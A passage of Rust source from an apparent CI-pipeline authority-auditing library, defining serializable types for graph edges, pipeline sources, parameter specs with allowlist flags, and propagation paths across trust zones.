    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub permissions_summary: Option<String>,
}
1256
/// Maximum characters per summary string field on [`AuthorityEdgeSummary`].
///
/// This constant only declares the bound; the truncation itself is not
/// performed in this part of the file.
pub const AUTHORITY_EDGE_SUMMARY_FIELD_MAX: usize = 192;
1259
/// A directed edge in the authority graph.
#[allow(missing_docs)]
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct Edge {
    /// Identifier of this edge; `PropagationPath::edges` lists edges by this
    /// id type.
    pub id: EdgeId,
    /// Node the edge starts at.
    pub from: NodeId,
    /// Node the edge points to.
    pub to: NodeId,
    /// Which authority/data-flow relation this edge models.
    pub kind: EdgeKind,
    /// Present on `has_access_to` edges whose target is an identity node.
    /// Left out of the serialized edge when `None`; a missing field
    /// deserializes to `None`.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub authority_summary: Option<AuthorityEdgeSummary>,
}
1272
1273// ── Pipeline source ──────────────────────────────────────────────
1274
/// Where the pipeline definition came from.
#[allow(missing_docs)]
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct PipelineSource {
    /// File the pipeline definition came from.
    pub file: String,
    /// Repository, if set. Left out of the serialized output when `None`.
    #[serde(skip_serializing_if = "Option::is_none")]
    pub repo: Option<String>,
    /// Git ref, if set. Left out of the serialized output when `None`.
    #[serde(skip_serializing_if = "Option::is_none")]
    pub git_ref: Option<String>,
    /// SHA of the commit being analyzed; reproducibility hint when set.
    /// Parsers leave None; CI integrations populate this from the build env.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub commit_sha: Option<String>,
}
1289
1290// ── Pipeline parameter spec ──────────────────────────────────────
1291
/// Pipeline-level parameter declaration captured from a top-level
/// `parameters:` block.
///
/// Used by rules that need to reason about whether caller-supplied parameter
/// values are constrained (`values:` allowlist) or free-form (no allowlist on
/// a string parameter — shell-injection risk).
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct ParamSpec {
    /// Declared parameter type (`string`, `number`, `boolean`, `object`, etc.).
    /// Empty string when the YAML omitted `type:` (ADO defaults to string).
    pub param_type: String,
    /// True when the parameter declares a `values:` allowlist that constrains
    /// the set of acceptable inputs. When true, free-form shell injection is
    /// not possible because the runtime rejects any value outside the list.
    pub has_values_allowlist: bool,
}
1306
1307// ── Propagation path (wire type for Finding.path) ────────────────
1308
/// A path that authority took through the graph.
/// The path is the product — it's what makes findings persuasive.
///
/// This is a **wire type**: it serialises into `Finding.path` in JSON output
/// and SARIF `properties.path`. The BFS algorithm that produces these paths
/// lives in `taudit-core::propagation` (workspace-internal); this struct is
/// the stable contract.
#[allow(missing_docs)]
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct PropagationPath {
    /// The authority origin (Secret or Identity).
    pub source: NodeId,
    /// Where authority ended up.
    pub sink: NodeId,
    /// The full edge path from source to sink.
    pub edges: Vec<EdgeId>,
    /// Did this path cross a trust zone boundary?
    pub crossed_boundary: bool,
    /// If crossed, from which zone to which zone, as a `(from, to)` pair.
    /// Left out of the serialized output when `None`.
    #[serde(skip_serializing_if = "Option::is_none")]
    pub boundary_crossing: Option<(TrustZone, TrustZone)>,
}
taudit_api/lib.rs

taudit_api/
lib.rs